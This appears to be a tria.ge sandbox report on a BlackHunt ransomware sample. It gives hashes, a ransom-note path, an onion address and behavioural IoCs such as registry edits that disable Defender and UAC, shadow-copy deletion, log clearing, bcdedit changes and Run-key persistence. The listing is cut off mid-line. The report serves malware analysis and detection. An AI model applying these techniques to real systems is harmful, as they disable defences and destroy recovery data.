Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
101s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:25
Static task
static1
Behavioral task
behavioral1
Sample
0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe
Resource
win10v2004-20231222-en
General
-
Target
0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe
-
Size
707KB
-
MD5
fe59bd9cb22d1fa7eecd7c58db545596
-
SHA1
d0e0b9f25ceef983d4af79936f3f1f67ec772939
-
SHA256
0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435
-
SHA512
aafa930aeaffd04bcf473069049617657fb6cd0ce4093db66efc805d50cea8bd42d1d1dceb6ab323d349e772208b80120b9449c0f500d87330b764e6d7ef18c8
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1g86vnh:6uaTmkZJ+naie5OTamgEoKxLWLUh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 5852 fsutil.exe 14056 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 13336 wevtutil.exe 13584 wevtutil.exe 2448 wevtutil.exe 13604 wevtutil.exe 9172 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1832 bcdedit.exe 9172 bcdedit.exe 14040 bcdedit.exe 13764 bcdedit.exe -
Renames multiple (3319) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 10524 wbadmin.exe 14280 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\I: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\S: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\U: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\N: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\W: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\A: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\G: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\J: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\K: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\Y: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\R: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\O: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\P: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\V: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\M: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\L: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\Z: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\X: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\B: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened (read-only) \??\H: 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\he-il\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\he-il\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\sk-sk\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\cstm_brand_preview2x.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\core_icons.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\hr-hr\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\Java\jdk-1.8\lib\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\Java\jre-1.8\bin\dtplugin\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-cn\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ru-ru\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\selector.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ca-es\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ar-ae\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ar-ae\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-gb\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\adc_logo.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\javaws.jar 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_2x.png 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\sv-se\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\cs-cz\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\cs-cz\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#BlackHunt_ReadMe.hta 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\ui-strings.js 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sk-sk\#BlackHunt_Private.key 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\#BlackHunt_ReadMe.txt 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 8456 5148 WerFault.exe 251 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 964 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2312 vssadmin.exe 3228 vssadmin.exe 4960 vssadmin.exe 1612 vssadmin.exe 4332 vssadmin.exe 13748 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 8600 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings cmd.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 11132 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Token: SeRestorePrivilege 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Token: SeBackupPrivilege 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Token: SeTakeOwnershipPrivilege 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Token: SeAuditPrivilege 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Token: SeSecurityPrivilege 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Token: SeIncBasePriorityPrivilege 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe Token: SeBackupPrivilege 2912 reg.exe Token: SeRestorePrivilege 2912 reg.exe Token: SeAuditPrivilege 2912 reg.exe Token: SeBackupPrivilege 7532 wbengine.exe Token: SeRestorePrivilege 7532 wbengine.exe Token: SeSecurityPrivilege 7532 wbengine.exe Token: SeSecurityPrivilege 9172 wevtutil.exe Token: SeBackupPrivilege 9172 wevtutil.exe Token: SeSecurityPrivilege 13336 wevtutil.exe Token: SeBackupPrivilege 13336 wevtutil.exe Token: SeSecurityPrivilege 13584 wevtutil.exe Token: SeBackupPrivilege 13584 wevtutil.exe Token: SeSecurityPrivilege 13604 wevtutil.exe Token: SeBackupPrivilege 13604 wevtutil.exe Token: SeSecurityPrivilege 2448 wevtutil.exe Token: SeBackupPrivilege 2448 wevtutil.exe Token: SeDebugPrivilege 8600 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4408 wrote to memory of 4868 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 220 PID 4408 wrote to memory of 4868 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 220 PID 4408 wrote to memory of 1892 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 95 PID 4408 wrote to memory of 1892 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 95 PID 4408 wrote to memory of 4724 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 96 PID 4408 wrote to memory of 4724 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 96 PID 4408 wrote to memory of 1128 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 184 PID 4408 wrote to memory of 1128 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 184 PID 4868 wrote to memory of 1328 4868 cmd.exe 219 PID 4868 wrote to memory of 1328 4868 cmd.exe 219 PID 4408 wrote to memory of 2960 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 218 PID 4408 wrote to memory of 2960 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 218 PID 4408 wrote to memory of 3484 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 176 PID 4408 wrote to memory of 3484 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 176 PID 1892 wrote to memory of 4908 1892 cmd.exe 101 PID 1892 wrote to memory of 4908 1892 cmd.exe 101 PID 4724 wrote to memory of 3044 4724 cmd.exe 103 PID 4724 wrote to memory of 3044 4724 cmd.exe 103 PID 4408 wrote to memory of 4988 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 216 PID 4408 wrote to memory of 4988 4408 0732a28ff29c8b0bc2a6a96f81c7d09878e5e74005f9efd0525dfc5b42991435.exe 216 PID 1128 wrote to memory of 1616 1128 cmd.exe 214 PID 1128 wrote to memory of 1616 